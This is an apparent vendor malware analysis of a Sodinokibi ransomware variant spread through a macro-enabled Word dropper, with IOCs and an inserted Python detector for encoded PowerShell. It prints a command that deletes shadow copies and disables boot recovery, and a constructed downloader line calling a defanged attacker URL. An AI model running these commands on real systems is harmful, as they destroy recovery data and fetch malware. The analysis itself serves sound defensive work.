Analysis of Sodinokibi Ransomware Variant

Category: IT Technology · Published: 4 years ago


Summary

CyOps, Cynet SOC team, recently encountered a new variant of the Sodinokibi ransomware, discovering several interesting traits. In this article we share a detailed analysis.

Sodinokibi Ransomware’s affiliates use a wide range of tactics to distribute the ransomware and earn money. This is shown in a wave of attacks involving the breaching of legitimate websites and replacing of downloaded files with the infected Sodinokibi file, hacking into managed service providers (MSPs) to push Sodinokibi to managed endpoints, and by utilizing spam campaigns for a wide net.

In this case, the Sodinokibi ransomware was distributed through a phishing email whose attachment lured users into downloading and opening the file containing the malicious payload. The attackers used a “weaponized” Word document containing VBA macros that act as a dropper. The malicious document asks the user to enable macros; if macros are already enabled, the code executes automatically via the AutoOpen function. Overall, the VBA code executes a multi-stage, heavily obfuscated PowerShell script in an attempt to evade AV and other security solutions. Additionally, it uses advanced techniques to evade sandboxes.

Fileless attacks such as this have been significantly evolving since 2017 and pose severe challenges to both signature-based and behavioral security tools.


Investigation Overview

During our investigation, we discovered the following information:

According to the process tree relationship, PowerShell was spawned by WINWORD.EXE that opened a file named “info_17.07.doc”. We discovered the same behavior for another Word file named “VolontariDipendenti-addestramento-congiunto8-12Luglio.doc” and we assume there are more instances of the malicious Office file with different names / hashes.


Once the malicious VBA code executed, it launched a Base64-encoded command through PowerShell.


The decoded command reveals a further obfuscated and encoded stage.


After decoding that stage as well, we obtained a simple PowerShell script.


The script attempts to download and execute an executable named ‘KiLrd.exe’ from the malicious URL ‘hxxp://fcamylleibrahim[.]top/sywo/fgoow[.]php?l=dxclass2.gxl’.

The executable is saved to the user profile directory, referenced by the environment variable ‘$env:userprofile’ (“C:\Users\user_name”).

We have tried to download the executable file, but unfortunately the malicious URL was not available during the investigation.

The script further attempts to download additional code from another URL, ‘hxxp://185[.]193[.]141[.]248/gs[.]php’.


This code first checks the host’s processor architecture in order to start the matching PowerShell instance (32-bit or 64-bit); it then starts the PowerShell process, which invokes a relatively long script hosted at yet another URL: ‘hxxps://pastebin[.]com/raw/CY2EEMJN’.

That script turns out to be an Empire module (Empire is described below); its source code can be examined in the Empire GitHub project:

https://github.com/EmpireProject/Empire/blob/master/data/module_source/code_execution/Invoke-ReflectivePEInjection.ps1

Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. It is the merging of the previous PowerShell Empire and Python EmPyre projects. The Empire framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

The attackers use the module above to reflectively load a DLL (which turns out to be the ransomware) into the PowerShell process: the DLL is loaded from memory, never from disk. This is a well-known evasion technique for bypassing Anti-Virus software.

The attackers embedded the malicious DLL in the script as a hard-coded byte array that is then reflectively loaded. One advantage of this approach is that the byte array can be stored encrypted and decrypted only in memory, which bypasses Anti-Virus engines.

In a small excerpt of the attackers’ Empire script, the DLL can be seen Base64-encoded and converted to a byte array.


Once this module runs under PowerShell, the malicious DLL executes inside the PowerShell process memory, encrypts the files on the infected machine, and then drops an instructions file asking the user to pay a ransom to decrypt them.

This ransomware places ransom messages in every folder that contains encrypted files. The name of the text file depends on the extension appended to the encrypted files, which is generated randomly.

For example, if the extension is “.qv05z”, the ransom message file will be called “qv05z-readme.txt”. Sodinokibi also changes the desktop wallpaper.

The ransomware encrypts the files, changes the desktop wallpaper, and dumps a txt file with instructions on how to pay the ransom for decrypting the files, as shown in the screenshots captured during the investigation.


Attack Flow

The process tree captured after the PowerShell command executed shows the following:


We can see that cmd.exe spawned vssadmin.exe to remove the shadow copies of the files, and bcdedit.exe to disable the Windows recovery and repair functions at boot, using the command:

C:\Windows\System32\cmd.exe "/c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures"
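As an added example (not code from the original article or from Cynet), the following Python script reproduces two of the analysis steps above from a defender's seat: peeling the nested -EncodedCommand layers off a PowerShell command line, and flagging the behaviours this article describes (remote download, reflective PE injection, the Pastebin stager, shadow-copy deletion and the bcdedit recovery changes). The sample command line is constructed for the example, reusing only the defanged URL and file name from the IOC list.

```python
import base64
import re

# PowerShell accepts -EncodedCommand and its short forms -e, -ec, -enc; the
# argument is the script encoded as UTF-16LE and then Base64.
ENC_SWITCH = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Behaviours described in the article, as case-insensitive patterns.
INDICATORS = {
    "reflective_pe_injection": re.compile(r"Invoke-ReflectivePEInjection", re.I),
    "remote_download": re.compile(r"Download(?:File|String)\s*\(", re.I),
    "pastebin_stager": re.compile(r"pastebin\[?\.\]?com/raw/", re.I),
    "shadow_copy_deletion": re.compile(r"vssadmin(?:\.exe)?\s+Delete\s+Shadows", re.I),
    "recovery_disabled": re.compile(r"bcdedit\s+/set\s+\{default\}\s+"
                                    r"(?:recoveryenabled\s+No|bootstatuspolicy\s+ignoreallfailures)", re.I),
}

def decode_stages(cmdline: str, max_depth: int = 5) -> list:
    """Peel nested -EncodedCommand layers; returns the decoded stages, outermost first."""
    stages, current = [], cmdline
    for _ in range(max_depth):
        match = ENC_SWITCH.search(current)
        if not match:
            break
        try:
            current = base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
        except ValueError:  # not Base64/UTF-16LE, e.g. a stray "-e" argument
            break
        stages.append(current)
    return stages

def scan(cmdline: str) -> list:
    """Names of the indicators found in the command line or any decoded stage, sorted."""
    hits = set()
    for text in [cmdline] + decode_stages(cmdline):
        hits.update(name for name, pat in INDICATORS.items() if pat.search(text))
    return sorted(hits)

def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument (UTF-16LE, Base64); used here only for test data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample, not the real one: two encoded layers around a downloader shaped like
# the stage in the article (defanged URL and file name taken from the IOC list).
INNER = r'(New-Object Net.WebClient).DownloadFile("hxxp://fcamylleibrahim[.]top/sywo/fgoow[.]php?l=dxclass2.gxl", "$env:userprofile\KiLrd.exe")'
STAGE2 = "powershell -NoP -W Hidden -enc " + encode_command(INNER)
SAMPLE_CMDLINE = "powershell.exe -ExecutionPolicy Bypass -EncodedCommand " + encode_command(STAGE2)
```

In practice scan() would run over the CommandLine field of Sysmon event 1 or Windows Security event 4688 records, while decode_stages() alone is useful when triaging a single suspicious command line.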


This variant of the Sodinokibi ransomware is new in the wild: its creation time dates from the last week, and at the time of the investigation it was also new to VirusTotal.


Summary of IOC

  • SHA256:
    c20e4249716805ab2c8645de65874797a2671ae16a30b9f1625ceb5f4bdd3ae6 – DLL file

  • Network IOC:
    IP address: 185.193.141.248
    URL: hxxp://185[.]193[.]141[.]248/gs[.]php
    URL: hxxp://fcamylleibrahim[.]top/sywo/fgoow[.]php?l=dxclass2.gxl
    Domain: fcamylleibrahim[.]top

  • File location:
    “C:\Users\user\KiLrd.exe”

Cynet Detection and Protection

This type of attack was detected and blocked by Cynet using several detection mechanisms.


